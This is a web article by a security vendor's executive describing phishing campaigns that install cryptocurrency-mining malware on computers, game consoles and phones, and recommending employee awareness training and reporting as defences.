Skip to main content

Watch out: rising malware attacks designed to mine cryptocurrencies

(Image credit: Image Credit: David McBee / Pexels)

The market for cryptocurrencies has been incredibly volatile, and as these forms of digital currencies rise and fall in value, the media has persistently covered their story and interest hasn’t waned. Over the past year, articles followed the drastic changes in the price of bitcoin – the first cryptocurrency – from less than $1000 to its peak at $19,783.21 (opens in new tab), as well as the advertisement of cryptocurrency and its nefarious uses. Despite often negative headlines, investment in bitcoin is still plentiful and people continue to mine the currency which requires dedicated hardware and masses of computing power. Therein lies the route from cryptocurrency to phishing attack, as hackers take control of victim’s devices – be that a computer, smartphone or gaming device – to mine cryptocurrencies and gain payment in return. 

Phishing emails to mining botnets

Last year, Cofense observed more malware attacks designed to mine cryptocurrencies from our customers’ websites.  This tracks with a Webroot study (opens in new tab) showing that since September 2017 over 5,000 websites have been compromised with CoinHive, which mines Monero by hijacking site visitors’ CPU power. Cryptocurrency mining software is often delivered through phishing emails, whereby clicking on a malicious link or opening a compromised attachment allows hackers to take over control of victim’s devices without their knowledge in order to use their compute power to mine for cryptocurrency. Indeed, cryptomining is best supported by massive parallel processing, making it desirable for hackers to take over several devices. This has the potential to be an additional management burden which has caused hackers to create cryptominer botnets, designed to task several compromised devices to perform cryptocurrency mining simultaneously, as each compromised device becomes a bot in the network. 

The illicit bots participate in cryptominer pools, wherein processing power is distributed over devices within the botnet network, enabling cryptocurrencies to be mined more efficiently and quickly. In summary, victim devices are used to generate currency for the threat actor without their owners’ knowledge or permission, often reducing the efficiency of affected computers. 

In campaigns specifically observed by Cofense, phishing emails delivered a Word document containing macro scripting that, when run, would download and execute a cryptominer host. The macro script then feeds the application instructions to include which mining pool it will participate in, the appropriate wallet address to send successfully-mined credit, and various runtime variables such as maximum CPU usage. The application then proceeds to begin to work on the solutions required to mine and unlock the cryptocurrency.

What devices are targeted? 

Mining requires a lot of processing power and a dedicated internet connection, as well as an uninterrupted power source. Unsurprisingly, computers therefore are frequently targeted, as well as gaming devices and smartphones. Playstation and Xbox for example have powerful Graphic Processing Units (GPUs) and are designed for high performance, making them a perfect target for cryptomining. 

While there are numerous social engineering techniques that can be used to entice a user into clicking a malicious link and falling victim to a phishing attack, gamers often have similar profiles that can be harnessed by attackers. For example, hackers send around emails centred on common gaming topics such as release date news, luring in victims to click on a compromised link. Gamers may also be more likely to fall victim to a phishing attack if emails look like they come from a legitimate source, such as a game publishers. 

Despite the much lower power source, hackers are increasingly targeting victims’ smartphones. For example, last Christmas Android apps available to download on Google Play were found encoded with malicious mining capabilities (opens in new tab). In such cases, the JavaScript runs code, hiding this process from the user. While smartphone hacks generate much less profit compared to computer or gaming devices, due to the lower compute power, all are vulnerable to hacking. 

What can businesses do? 

A huge range of computers and connected devices reside within a business and many of these are responsible for mission critical business operations.  As such, they often have a significant amount of compute power, making them a key target for hackers wanting to cryptomine. What’s more, the intricate web of corporate, networked computers often means a hacker can elevate privileges and land further attacks to bring even more computers into its bot. 

The best way to prevent against these types of attacks is to build a comprehensive and collaborative defence.  While technology is important to reduce the chances of employees receiving a malicious email in the first place, businesses also need to invest in their workforce to become a strong line of defence. 

It is vitally important to educate staff about email based attacks and condition them to identify suspicious emails, as ultimately this will build resilience.  Simulations of phishing attacks can be run regularly to get employees used to recognising suspicious emails and technical integrations, such as the ‘report’ button make it easier for them to know what to do in the event of receiving a potential phishing email.  Cofense regularly proves that as employees report more, they become less susceptible, indeed in 2017 reporting rates were up more than four percent annually, with susceptibility rates dropping two percent.

Other tips that can be used to build workforce resilience to phishing attacks include encouraging employees to think twice when they read emails, as offers that seem too good to be true often are. Attachments and downloads should also be viewed with caution, especially if they’ve come from an unexpected email. Any email designed to play on an emotion – whether that be fear, curiosity or reward – should be scrutinised more than usual, as often hackers use this to cloud judgement.  It’s also best practice to verify anything you find suspicious.  For example, if an email pretends to come from a partner or consultant connected to something you’re working on, verify their name and contact information through a different source and reach out directly.  

It is also important to educate employees on the current phishing emails circulating. If businesses give the most up-to-date intelligence on what to look out for, employees can help IT teams catch malicious emails as early as possible and expel hackers from the network; all thanks to employees supplying real-time intelligence. 

Given more and more cryptocurrencies are being launched, there is likely to be an increase in phishing attacks designed to take control of computers to mine. In the last year, phishing attacks increased 65 percent worldwide as it was, making conditioning users to be wise to suspicious emails fundamental to stopping attackers in their tracks.  Defeating the hackers takes a team and vigilant humans should be central to that.  

Aaron Higbee, Co-Founder and CTO of Cofense (opens in new tab) 

Image Credit: David McBee / Pexels

Aaron is the Co-Founder and CTO of Cofense (formerly PhishMe), Inc. directing all aspects of development and research that drives the feature set of this market leading solution. The Cofense method for awareness training was incubated from consulting services provided by Intrepidus Group, a company that Aaron Co-Founded with Rohyt Belani in 2007.